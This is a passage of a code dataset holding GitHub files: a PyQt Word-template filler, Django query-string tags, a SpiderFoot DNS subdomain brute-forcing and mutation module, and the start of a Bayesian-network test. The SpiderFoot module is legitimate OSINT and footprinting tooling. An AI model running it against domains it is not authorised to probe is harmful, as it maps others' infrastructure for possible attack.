+{"seq_id": "42214197487", "text": "import sys\r\nimport os\r\nfrom PyQt5 import QtWidgets # For GUI Window\r\nimport GUI #file with design description\r\nfrom docxtpl import DocxTemplate\r\nimport openpyxl\r\nfrom datetime import datetime # To know when catalog file was modified last time\r\n\r\n\r\n# Window with result\r\nclass DialogApp(QtWidgets.QDialog, GUI.Ui_Dialog):\r\n def __init__(self, result_message, res_fname, er_ocur):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.lblResultMessage.setText(result_message)\r\n self.res_fname = res_fname\r\n # If there was an error, button will have other purpose\r\n if er_ocur:\r\n self.btnOk.setText(\"OK\")\r\n self.btnOk.clicked.connect(self.hide)\r\n else:\r\n self.btnOk.clicked.connect(self.open_folder)\r\n\r\n # open folder with result if there weren't any errors\r\n def open_folder(self):\r\n os.startfile(self.res_fname)\r\n self.hide()\r\n\r\n\r\n# Start Window\r\nclass MainApp(QtWidgets.QMainWindow, GUI.Ui_MainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.setupUi(self)\r\n # Checking if there catalog file with default name and file location\r\n if os.path.isfile(os.path.dirname(os.getcwd()) + \"\\Каталог.xlsx\"):\r\n self.cat_name = os.path.dirname(os.getcwd()) + \"\\Каталог.xlsx\"\r\n # Using back up catalog file\r\n else:\r\n self.cat_name = \"Каталог_default.xlsx\"\r\n # Initial setting\r\n self.res_changed = False\r\n self.lineEditCatalog.setText(os.path.abspath(self.cat_name)) # Initial setting\r\n self.btnCatalog.clicked.connect(self.browse_Catalog) # Do browse_Catolog if button is clicked\r\n # Checking if there template folder with default name and location\r\n if os.path.exists(os.path.dirname(os.getcwd()) + \"\\\\template\"):\r\n self.lineEditTemplate.setText(os.path.abspath(os.path.dirname(os.getcwd()) + \"\\\\template\"))\r\n # Using back up template folder\r\n else:\r\n self.lineEditTemplate.setText(os.path.abspath(\"template_default\"))\r\n self.btnTemplate.clicked.connect(self.browse_Template) # Do browse_Template if button is clicked\r\n # Finding out when selected catalog file was modified last time\r\n cat_mtime = datetime.fromtimestamp(os.stat(self.cat_name).st_mtime).strftime(\"%d.%m.%Y_%H.%M\")\r\n # Initial setting\r\n self.lineEditResult.setText(os.path.abspath(os.path.dirname(os.getcwd()) + \"\\\\result_\" + cat_mtime))\r\n self.btnResult.clicked.connect(self.browse_Result) # Do browse_Result if button is clicked\r\n self.btnStart.clicked.connect(self.process) # Do main body of utility\r\n\r\n # selecting new catalog file with usage of dialog window\r\n def browse_Catalog(self):\r\n ch_file = QtWidgets.QFileDialog.getOpenFileName(self, \"Выберите файл Каталог\", self.cat_name, \" *.xls *.xlsx\")\r\n if ch_file[0]: # checking that User selected something\r\n self.lineEditCatalog.setText(ch_file[0])\r\n # If User hasn't selected specific folder for result saving, modify future folder name\r\n if not self.res_changed:\r\n cat_mtime = datetime.fromtimestamp(os.stat(ch_file[0]).st_mtime).strftime(\"%d.%m.%Y_%H.%M\")\r\n self.lineEditResult.setText(os.path.abspath(os.path.dirname(os.getcwd()) + \"\\\\result_\" + cat_mtime))\r\n\r\n # selecting new folder with templates with usage of dialog window\r\n def browse_Template(self):\r\n ch_fold = QtWidgets.QFileDialog.getExistingDirectory(\r\n self, \"Выберите папку с шаблонами\",\r\n os.path.dirname(self.lineEditTemplate.text())\r\n )\r\n if ch_fold: # checking that User selected something\r\n self.lineEditTemplate.setText(ch_fold)\r\n\r\n # selecting new folder for results with usage of dialog window\r\n def browse_Result(self):\r\n ch_fold = QtWidgets.QFileDialog.getExistingDirectory(\r\n self,\r\n \"Выберите папку, куда сохранить результаты работы\",\r\n os.path.dirname(self.lineEditResult.text())\r\n )\r\n if ch_fold: # checking that User selected something\r\n self.lineEditResult.setText(ch_fold)\r\n self.res_changed = True # Stop modifying name of folder with result when new catalog file is selected\r\n\r\n # main body of utility\r\n def process(self):\r\n # Reset\r\n self.res_changed = False\r\n # If selected catalog file doesn't exist prepare message for User\r\n if os.path.isfile(self.lineEditCatalog.text()) == False:\r\n result_message = \"Работа утилиты прервана, т.к. указанного файл-каталога не существует\"\r\n res_fname = \"\"\r\n er_ocur = True\r\n # If selected folder with templates doesn't exist prepare message for User\r\n elif os.path.exists(self.lineEditTemplate.text()) == False:\r\n result_message = \"Работа утилиты прервана, т.к. указанной папки с шаблонами не существует\"\r\n er_ocur = True\r\n res_fname = \"\"\r\n # If selected catalog file and folder with templates do exist\r\n else:\r\n # Reset\r\n er_ocur = False\r\n # open catalog file\r\n cat_name = self.lineEditCatalog.text()\r\n wb = openpyxl.load_workbook(cat_name, data_only=True)\r\n # reading time of last modification of catalog file\r\n content = list(map(list, wb.active.iter_rows(values_only=True)))\r\n # first row with meanings in catalog files will be used for tags in word document\r\n label_tuple = tuple(map(str, content[0]))\r\n # creating folder with result if necessary\r\n res_fname = self.lineEditResult.text()\r\n os.makedirs(res_fname, exist_ok=True)\r\n # creating set for positions which templates were not found\r\n joker_set = set()\r\n # creating new word documents according to template and catalog files\r\n for i in range(1, len(content)):\r\n # checking that there is something for template\r\n if content[i][1] is None or (set(str(content[i][1]))) == {\" \"}:\r\n content[i][1] = \"None\"\r\n # choosing template. Template name is in a second column due to the catalog structure\r\n tmpl_file = self.lineEditTemplate.text() + \"\\\\\" + str(content[i][1]) + \".docx\"\r\n # If template file wasn't found, joker template will be used\r\n if not os.path.isfile(tmpl_file):\r\n # remembering names which templates were not found\r\n joker_set.add(content[i][1])\r\n if os.path.isfile(self.lineEditTemplate.text() + \"\\\\joker.docx\"):\r\n tmpl_file = self.lineEditTemplate.text() + \"\\\\joker.docx\"\r\n # if joker template doesn't exist in selected folder with templates using joker in\r\n # back up template folder\r\n else:\r\n tmpl_file = \"template_default\\\\joker.docx\"\r\n # opening proper or joker template\r\n doc = DocxTemplate(tmpl_file)\r\n # creating dictionary for tags replacement\r\n context = dict(zip(label_tuple, content[i]))\r\n # tags replacement\r\n doc.render(context, autoescape=True)\r\n # checking that postfix isn't empty (first column in catalog) and saving new documents\r\n if content[i][0] is None or (set(str(content[i][0]))) == {\" \"}:\r\n doc.save(res_fname + \"\\\\\" + str(str(content[i][1] + ' ' + str(i) + '.docx')))\r\n else:\r\n doc.save(res_fname + \"\\\\\" + str(str(content[i][1] + ' ' + str(content[i][0]) + '.docx')))\r\n # Message for User generating\r\n # Show the name of folder where results were saved\r\n result_message = \"Документы сгенерированы и сохранены в папку \" + res_fname\r\n # if joker was used show for which templates\r\n if len(joker_set) > 0:\r\n result_message +=\\\r\n \"\\n\\nДля следующих наименований не были найдены шаблоны и применялась стандартная форма:\"\r\n for i in joker_set:\r\n result_message += \"\\n - \\\"\" + i + \"\\\"\"\r\n # call for Window with result\r\n window = DialogApp(result_message, res_fname, er_ocur)\r\n window.show()\r\n window.exec_()\r\n\r\ndef main():\r\n # call for start Window\r\n app = QtWidgets.QApplication(sys.argv)\r\n window = MainApp()\r\n window.show()\r\n app.exec_()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "repo_name": "IvanovVasilii/filler-standard-documents", "sub_path": "Sisuphus.py", "file_name": "Sisuphus.py", "file_ext": "py", "file_size_in_byte": 8997, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 11, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 11, "usage_type": "name"}, {"api_name": "GUI.Ui_Dialog", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.startfile", "line_number": 26, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 31, "usage_type": "name"}, {"api_name": "GUI.Ui_MainWindow", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 36, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 46, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 47, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 55, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 55, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "line_number": 61, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 61, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 66, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 67, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getExistingDirectory", "line_number": 71, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 71, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 71, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getExistingDirectory", "line_number": 80, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 80, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 80, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "openpyxl.load_workbook", "line_number": 109, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "docxtpl.DocxTemplate", "line_number": 137, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 163, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 163, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 163, "usage_type": "attribute"}]}
+{"seq_id": "40975277809", "text": "from django import template\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef query_update(context, **kwargs):\n updated = context['request'].GET.copy()\n for k, v in kwargs.items():\n updated[k] = v\n return updated.urlencode()\n\n\n@register.simple_tag(takes_context=True)\ndef query_append(context, k=None, v=None, **kwargs):\n if k and v:\n kwargs[k] = v\n updated = context['request'].GET.copy()\n for k, v in kwargs.items():\n updated.appendlist(k, v)\n return updated.urlencode()\n\n\n@register.simple_tag\ndef test(test):\n import ipdb\n ipdb.set_trace()\n", "repo_name": "ad-m/django-atom", "sub_path": "atom/templatetags/querystring_tags.py", "file_name": "querystring_tags.py", "file_ext": "py", "file_size_in_byte": 619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.template.Library", "line_number": 3, "usage_type": "call"}, {"api_name": "django.template", "line_number": 3, "usage_type": "name"}, {"api_name": "ipdb.set_trace", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "12679617037", "text": "import re\nimport random\nimport threading\nimport dns.resolver\nfrom time import sleep\nfrom csv import DictReader\nfrom spiderfoot import SpiderFootEvent, SpiderFootPlugin\n\n\nclass sfp_dnsbrute(SpiderFootPlugin):\n\n meta = {\n 'name': \"DNS Brute-forcer\",\n 'summary': \"Attempts to identify hostnames through brute-forcing common names and iterations.\",\n 'flags': [\"\"],\n 'useCases': [\"Footprint\", \"Investigate\"],\n 'categories': [\"DNS\"]\n }\n\n # Default options\n opts = {\n \"domainonly\": True,\n \"numbermutation\": True,\n \"alphamutation\": True,\n \"_maxthreads\": 100\n }\n\n # Option descriptions\n optdescs = {\n \"domainonly\": \"Only attempt to brute-force names on domain names, not hostnames (some hostnames are also sub-domains).\",\n \"numbermutation\": \"For any host found, increment/decrement existing numbers (if any) and try appending 1, 01, 001, -1, -01, -001, 2, 02, etc. (up to 10)\",\n \"alphamutation\": \"For any host found, try common mutations such as -test, -old, etc.\",\n \"_maxthreads\": \"Maximum threads\"\n }\n\n _ipRegex = re.compile(r\"[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\")\n\n def setup(self, sfc, userOpts=dict()):\n self.sf = sfc\n self.sf.debug(\"Setting up sfp_dnsbrute\")\n self.state = self.tempStorage()\n self.state.update({\n \"sub_wordlist\": [],\n \"valid_hosts\": [],\n \"sent_events\": [],\n \"handled_events\": [],\n \"wildcards\": dict()\n })\n self.__dataSource__ = \"DNS\"\n self.lock = threading.Lock()\n self.iteration = 0\n\n for opt in list(userOpts.keys()):\n self.opts[opt] = userOpts[opt]\n\n self.word_regex = re.compile(r'[^\\d\\W_]+')\n self.word_num_regex = re.compile(r'[^\\W_]+')\n self.num_regex = re.compile(r'\\d+')\n\n dicts_dir = f\"{self.sf.myPath()}/spiderfoot/dicts/\"\n with open(f\"{dicts_dir}/subdomains.txt\", \"r\") as f:\n self.state[\"sub_wordlist\"] = list(set([x.strip().lower() for x in f.readlines()]))\n with open(f\"{dicts_dir}/subdomain_mutations_alpha.txt\", \"r\") as f:\n if self.opts[\"alphamutation\"]:\n self.state[\"alpha_mutation_wordlist\"] = list(set([x.strip().lower() for x in f.readlines()]))\n\n # set up nameservers\n self.resolvers = []\n nameservers = set()\n nameservers_url = \"https://public-dns.info/nameservers.csv\"\n nameservers_dict = self.sf.myPath() + \"/dicts/resolvers.txt\"\n # get every valid nameserver with 95% or higher reliability\n fetched_nameservers = str(self.sf.fetchUrl(\n nameservers_url,\n useragent=self.opts.get(\"_useragent\", \"Spiderfoot\")\n )[\"content\"])\n for line in DictReader(fetched_nameservers.splitlines()):\n ip_address = str(line.get(\"ip_address\", \"\")).strip()\n try:\n reliability = float(line.get(\"reliability\", 0))\n except ValueError:\n continue\n if reliability >= .95 and self._ipRegex.match(ip_address):\n nameservers.add(ip_address)\n # fall back to local dict if necessary\n if not nameservers:\n self.sf.debug(f\"Failed to retrieve nameservers from {nameservers_url}\")\n nameservers = set(self._ipRegex.findall(open(nameservers_dict, \"r\").read()))\n self.sf.debug(f\"Loaded {len(nameservers):,} nameservers from {nameservers_dict}\")\n else:\n self.sf.debug(f\"Loaded {len(nameservers):,} nameservers from {nameservers_url}\")\n self.verifyNameservers(nameservers)\n\n def resolve(self, host, tries=10, nameserver=None):\n if nameserver is None:\n resolver = self.getResolver()\n else:\n resolver = dns.resolver.Resolver()\n resolver.nameservers = [nameserver]\n\n self.sf.debug(f\"Resolving {host} using nameserver {resolver.nameservers[0]}\")\n\n ips = set()\n for recordType in [\"A\", \"AAAA\"]:\n try:\n for answer in resolver.resolve(host, recordType):\n ips.add(str(answer))\n break\n except dns.resolver.NXDOMAIN:\n break\n except Exception as e:\n self.sf.debug(f\"Error resolving \\\"{host}\\\": {e.__class__.__name__}: {e}\")\n if tries > 0:\n self.sf.debug(f\"Retrying \\\"{host}\\\"\")\n return self.resolve(host, tries=tries - 1, nameserver=nameserver)\n else:\n self.sf.debug(f\"Max retries ({tries:,}) exceeded for \\\"{host}\\\"\")\n return (host, [])\n\n return (host, list(ips))\n\n def isWildcard(self, target, ips):\n \"\"\"Checks if host+ips came from a wildcard DNS configuration\n Note: allows the first result through, so one entry is preserved\n\n Args:\n target (str): hostname\n ips (list): resolved IP addresses of hostname\n\n Returns:\n boolean: whether the host came from a wildcard DNS configuration\n \"\"\"\n wildcard = False\n host, domain = str(target).split(\".\", 1)\n\n # if we've already checked this domain:\n if domain in self.state[\"wildcards\"]:\n if all([ip in self.state[\"wildcards\"][domain] for ip in ips]):\n wildcard = True\n else:\n self.state[\"wildcards\"][domain] = self.getWildcardIPs(domain)\n\n return wildcard\n\n def getWildcardIPs(self, domain):\n randpool = \"bcdfghjklmnpqrstvwxyz3456789\"\n randhost = \"\".join([random.SystemRandom().choice(randpool) for x in range(10)]) + \".\" + domain\n return list(set([str(s) for s in self.resolve(randhost)[-1]]))\n\n def getResolver(self):\n with self.lock:\n self.iteration += 1\n return self.resolvers[self.iteration % len(self.resolvers)]\n\n def verifyNameservers(self, nameservers, timeout=2):\n \"\"\"Check each resolver to make sure it can actually resolve DNS names\n\n Args:\n nameservers (list): nameservers to verify\n timeout (int): timeout for dns query\n\n Returns:\n boolean: whether any of the nameservers are valid\n \"\"\"\n for nameserver in nameservers:\n threading.Thread(name=f\"sfp_dnsbrute_{nameserver}\", target=self.verifyNameserver, args=(nameserver, timeout)).start()\n sleep(timeout)\n if len(self.resolvers) > 0:\n self.sf.debug(f\"Using {len(self.resolvers):,} valid nameservers\")\n return True\n else:\n return False\n\n def verifyNameserver(self, nameserver, timeout=2):\n \"\"\"Validate a nameserver by making a sample query and a garbage query\n\n Args:\n nameserver (str): nameserver to verify\n timeout (int): timeout for dns query\n\n Returns:\n boolean: whether the nameserver is valid\n \"\"\"\n valid = True\n\n resolver = dns.resolver.Resolver()\n resolver.timeout = timeout\n resolver.lifetime = timeout\n resolver.nameservers = [nameserver]\n\n # first, make sure it can resolve google.com\n try:\n resolver.query(\"www.google.com\", \"A\")\n except Exception:\n valid = False\n\n # then, make sure it isn't feeding us garbage data\n randpool = \"bcdfghjklmnpqrstvwxyz3456789\"\n randhost = \"\".join([random.SystemRandom().choice(randpool) for x in range(10)]) + \".google.com\"\n try:\n results = list(resolver.query(randhost, \"A\"))\n if results:\n self.sf.debug(f\"Garbage data from nameserver: {nameserver}\")\n valid = False\n except Exception as e:\n self.sf.debug(f\"Garbage query to nameserver {nameserver} failed successfully: {e}\")\n\n if valid:\n self.sf.debug(f\"Valid nameserver: {nameserver}\")\n with self.lock:\n self.resolvers.append(resolver)\n else:\n self.sf.debug(f\"Invalid nameserver: {nameserver}\")\n\n return valid\n\n # What events is this module interested in for input\n def watchedEvents(self):\n ret = [\"DOMAIN_NAME\"]\n if not self.opts[\"domainonly\"] or self.opts[\"numbermutation\"] or self.opts[\"alphamutation\"]:\n ret += [\"INTERNET_NAME\", \"INTERNET_NAME_UNRESOLVED\"]\n return ret\n\n def producedEvents(self):\n return [\"INTERNET_NAME\"]\n\n def isValidHost(self, host, ips):\n \"\"\"Verify that the record is valid, not a duplicate, and not resulting from wildcard DNS\n\n Args:\n host (str): host to validate\n ips (list): IP addresses for hostname\n\n Returns:\n boolean: whether the record is valid\n \"\"\"\n\n # if we haven't seen the host before\n if host not in self.state[\"valid_hosts\"]:\n # if it's a wildcard\n if self.isWildcard(host, ips):\n self.sf.debug(f\"Invalid host (wildcard): {host}\")\n return False\n else:\n self.sf.debug(f\"Already processed host: {host}\")\n return False\n\n # make double-sure that this host actually exists\n ips_google = self.resolve(host, nameserver=\"8.8.8.8\")[1]\n ips_cloudflare = self.resolve(host, nameserver=\"1.1.1.1\")[1]\n if not ips_google or not ips_cloudflare:\n self.sf.debug(f\"Incorrectly-reported subdomain {host} does not exist.\")\n return False\n\n return True\n\n def sendEvent(self, source, host, ips, method=None):\n if method is None:\n method = \"\"\n host = host.lower()\n # skip if we've already sent this event\n eventDataHash = self.sf.hashstring(host)\n if eventDataHash in self.state[\"sent_events\"]:\n self.sf.debug(\"Skipping already-sent event\")\n return\n elif eventDataHash in self.state[\"handled_events\"]:\n self.sf.debug(\"Not sending already-handled event\")\n return\n self.state[\"sent_events\"].append(eventDataHash)\n\n if ips and self.isValidHost(host, ips):\n self.state[\"valid_hosts\"].append(host)\n self.sf.info(f\"Found subdomain via {method}: {host}\")\n # Report the host\n e = SpiderFootEvent(\"INTERNET_NAME\", host, self.__name__, source)\n self.notifyListeners(e)\n\n def getNumberMutations(self, host, num=10):\n subdomains = set()\n host, domain = host.split(\".\", 1)\n\n # detects numbers and increments/decrements them\n # e.g. for \"host2-p013\", we would try:\n # - \"host0-p013\" through \"host12-p013\"\n # - \"host2-p003\" through \"host2-p023\"\n # limited to three iterations for sanity's sake\n for match in list(self.num_regex.finditer(host))[-3:]:\n span = match.span()\n before = host[:span[0]]\n after = host[span[-1]:]\n number = host[span[0]:span[-1]]\n numlen = len(number)\n maxnum = min(int(\"9\" * numlen), int(number) + num)\n minnum = max(0, int(number) - num)\n for i in range(minnum, maxnum + 1):\n subdomains.add(f\"{before}{str(i).zfill(numlen)}{after}\")\n if not number.startswith(\"0\"):\n subdomains.add(f\"{before}{i}{after}\")\n\n # appends numbers after each word\n # e.g., for \"host-www\", we would try:\n # - \"host1-www\", \"host2-www\", etc.\n # - \"host-www1\", \"host-www2\", etc.\n # limited to three iterations for sanity's sake\n suffixes = [\"\", \"0\", \"00\", \"-\", \"-0\", \"-00\"]\n for match in list(self.word_regex.finditer(host))[-3:]:\n for s in suffixes:\n for i in range(num):\n span = match.span()\n before = host[:span[-1]]\n after = host[span[-1]:]\n subdomains.add(f\"{before}{s}{i}{after}\")\n # basic case so we don't miss anything\n for s in suffixes:\n for i in range(num):\n subdomains.add(f\"{host}{s}{i}\")\n\n # ensure we aren't including the source subdomain\n try:\n subdomains.remove(host)\n except KeyError:\n pass\n\n return subdomains\n\n def getAlphaMutations(self, host):\n subdomains = set()\n host, domain = host.split(\".\", 1)\n\n # if the input is \"host01-www\", it tries \"host\" and \"www\"\n # or if the input is \"host01\", it tries \"host\"\n for m in self.word_regex.findall(host):\n if m != host:\n subdomains.add(m)\n # same thing but including numbers\n # if the input is \"host01-www\", it tries \"host01\" and \"www\"\n for m in self.word_num_regex.findall(host):\n if m != host:\n subdomains.add(m)\n\n # host-dev, www-host, etc.\n for m in self.state[\"alpha_mutation_wordlist\"]:\n subdomains.add(f\"{host}{m}\")\n subdomains.add(f\"{host}-{m}\")\n subdomains.add(f\"{m}{host}\")\n subdomains.add(f\"{m}-{host}\")\n\n # ensure we aren't including the source subdomain\n try:\n subdomains.remove(host)\n except KeyError:\n pass\n\n return subdomains\n\n def bruteSubdomains(self, host, subdomains, threads):\n self.sf.info(f\"Resolving {len(subdomains):,} subdomains with {threads:,} threads.\")\n\n with self.threadPool(threads=threads, name='sfp_dnsbrute_subdomains') as pool:\n for hostname, ips in pool.map(\n [f\"{sub}.{host}\" for sub in subdomains],\n self.resolve,\n ):\n if ips:\n yield (hostname, ips)\n\n def handleEvent(self, event):\n if not self.resolvers:\n self.sf.error(\"No valid DNS resolvers\")\n return\n\n host = str(event.data).lower()\n\n self.sf.debug(f\"Received event, {event.eventType}, from {event.module}\")\n\n # skip if we've already processed this event\n eventDataHash = self.sf.hashstring(host)\n if eventDataHash in self.state[\"handled_events\"]:\n self.sf.debug(f\"Skipping already-processed event, {event.eventType}, from {event.module}\")\n return\n self.state[\"handled_events\"].append(eventDataHash)\n\n subdomains = set()\n method = \"brute-force\"\n base = str(host)\n threads = int(self.opts[\"_maxthreads\"])\n # if this isn't the main target, we can still do mutations\n if event.eventType in [\"INTERNET_NAME\", \"INTERNET_NAME_UNRESOLVED\"] and not self.getTarget().matches(event.data, includeChildren=False):\n if self.opts[\"numbermutation\"]:\n numberMutations = self.getNumberMutations(host)\n self.sf.debug(f\"Generated {len(numberMutations):,} number mutations of {host}\")\n subdomains.update(numberMutations)\n if self.opts[\"alphamutation\"]:\n alphaMutations = self.getAlphaMutations(host)\n self.sf.debug(f\"Generated {len(alphaMutations):,} alpha mutations of {host}\")\n subdomains.update(alphaMutations)\n method = \"mutation\"\n base = host.split(\".\", 1)[-1]\n threads = min(int(len(subdomains) / 3) + 1, self.opts[\"_maxthreads\"])\n # if this is the main target or we're brute-forcing subdomains of subdomains\n if self.getTarget().matches(event.data, includeChildren=False) or not self.opts[\"domainonly\"]:\n subdomains.update(set(self.state[\"sub_wordlist\"]))\n threads = int(self.opts[\"_maxthreads\"])\n\n # subdomain brute force\n for hostname, ips in self.bruteSubdomains(base, subdomains, threads=threads):\n self.sendEvent(event, hostname, ips, method)\n", "repo_name": "0x4A4C/spiderfoot", "sub_path": "modules/sfp_dnsbrute.py", "file_name": "sfp_dnsbrute.py", "file_ext": "py", "file_size_in_byte": 15850, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "spiderfoot.SpiderFootPlugin", "line_number": 10, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 50, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 56, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 57, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 58, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 77, "usage_type": "call"}, {"api_name": "dns.resolver.resolver.Resolver", "line_number": 98, "usage_type": "call"}, {"api_name": "dns.resolver.resolver", "line_number": 98, "usage_type": "attribute"}, {"api_name": "dns.resolver", "line_number": 98, "usage_type": "name"}, {"api_name": "dns.resolver.resolver", "line_number": 109, "usage_type": "attribute"}, {"api_name": "dns.resolver", "line_number": 109, "usage_type": "name"}, {"api_name": "random.SystemRandom", "line_number": 147, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 166, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 167, "usage_type": "call"}, {"api_name": "dns.resolver.resolver.Resolver", "line_number": 186, "usage_type": "call"}, {"api_name": "dns.resolver.resolver", "line_number": 186, "usage_type": "attribute"}, {"api_name": "dns.resolver", "line_number": 186, "usage_type": "name"}, {"api_name": "random.SystemRandom", "line_number": 199, "usage_type": "call"}, {"api_name": "spiderfoot.SpiderFootEvent", "line_number": 275, "usage_type": "call"}]}
+{"seq_id": "13833285409", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_pinfer\n----------------------------------\n\nTests for `pinfer` module.\n\"\"\"\n\nimport unittest\n\nimport networkx as nx\nimport numpy as np\n\n\ndef get_sprinkler():\n\n sprinkler = nx.DiGraph()\n\n sprinkler.add_node('R', prior=np.array([0.8, 0.2]))\n\n sprinkler.add_node('S', prior=np.array([0.9, 0.1]))\n\n sprinkler.add_node('W', CPT=np.zeros((2, 2)))\n sprinkler.add_edge('R', 'W')\n sprinkler.node['W']['CPT'][0, :] = np.array([0.8, 0.2])\n sprinkler.node['W']['CPT'][1, :] = np.array([0.0, 1.0])\n\n sprinkler.add_node('H', CPT=np.zeros((2, 2, 2)))\n sprinkler.add_edge('R', 'H')\n sprinkler.add_edge('S', 'H')\n sprinkler.node['H']['CPT'][0, 0, :] = np.array([1.0, 0.0])\n sprinkler.node['H']['CPT'][0, 1, :] = np.array([0.1, 0.9])\n sprinkler.node['H']['CPT'][1, 0, :] = np.array([0.0, 1.0])\n sprinkler.node['H']['CPT'][1, 1, :] = np.array([0.0, 1.0])\n\n return sprinkler\n\n\ndef sprinkler_example(analyse_function):\n\n sprinkler = get_sprinkler()\n\n analyse_function(sprinkler)\n\n assert (np.round(sprinkler.node['R']['belief'], 8) == np.array([0.8, 0.2])).all()\n assert (np.round(sprinkler.node['S']['belief'], 8) == np.array([0.9, 0.1])).all()\n assert (np.round(sprinkler.node['W']['belief'], 8) == np.array([0.64, 0.36])).all()\n assert (np.round(sprinkler.node['H']['belief'], 8) == np.array([0.728, 0.272])).all()\n\n sprinkler.node['H']['observation'] = np.array([0., 1.])\n\n analyse_function(sprinkler)\n\n assert (np.round(sprinkler.node['R']['belief'], 8) ==\n np.array([0.26470588, 0.73529412])).all()\n\n assert (np.round(sprinkler.node['S']['belief'], 8) ==\n np.array([0.66176471, 0.33823529])).all()\n\n assert (np.round(sprinkler.node['W']['belief'], 8) ==\n np.array([0.21176471, 0.78823529])).all()\n\n assert (np.round(sprinkler.node['H']['belief'], 8) ==\n np.array([0.00000000, 1.00000000])).all()\n\n sprinkler.node['W']['observation'] = np.array([0., 1.])\n\n analyse_function(sprinkler)\n\n assert (np.round(sprinkler.node['R']['belief'], 8) 